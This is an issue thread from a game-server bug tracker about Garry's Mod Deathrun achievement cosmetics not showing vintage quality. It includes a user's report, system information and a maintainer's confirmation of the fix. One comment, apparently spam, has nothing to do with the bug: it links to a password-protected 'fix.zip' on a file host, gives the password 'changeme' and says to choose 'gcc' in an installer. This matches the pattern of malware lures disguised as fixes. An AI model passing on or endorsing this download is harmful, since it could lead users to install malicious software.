### ISSUE TITLE
Deathrun achievement cosmetics are not vintage quality

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#84]
**Describe the bug**
The Halloween Deathrun achievement cosmetics are not vintage quality like the rest of the achievement cosmetics.

**System Information:**
```
Protocol version 24
Exe version 2023.06.28 (garrysmod)
Exe build: 17:03:26 Jul 22 2024 (9379) (4000)
GMod version 2024.08.09, branch: x86-64, multicore: 1
Linux 64bit
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Sod-ers** [comment]
In the achievements tab it does say the rewards are Vintage. However the items in my inventory do not reflect a Vintage quality. Can Vintage be applied to items that were distributed before the change? Because I use inventory filter & search features.

**Comment by TeddiO** [comment]
Pre-existing items received from achievements should now correctly display the vintage quality.
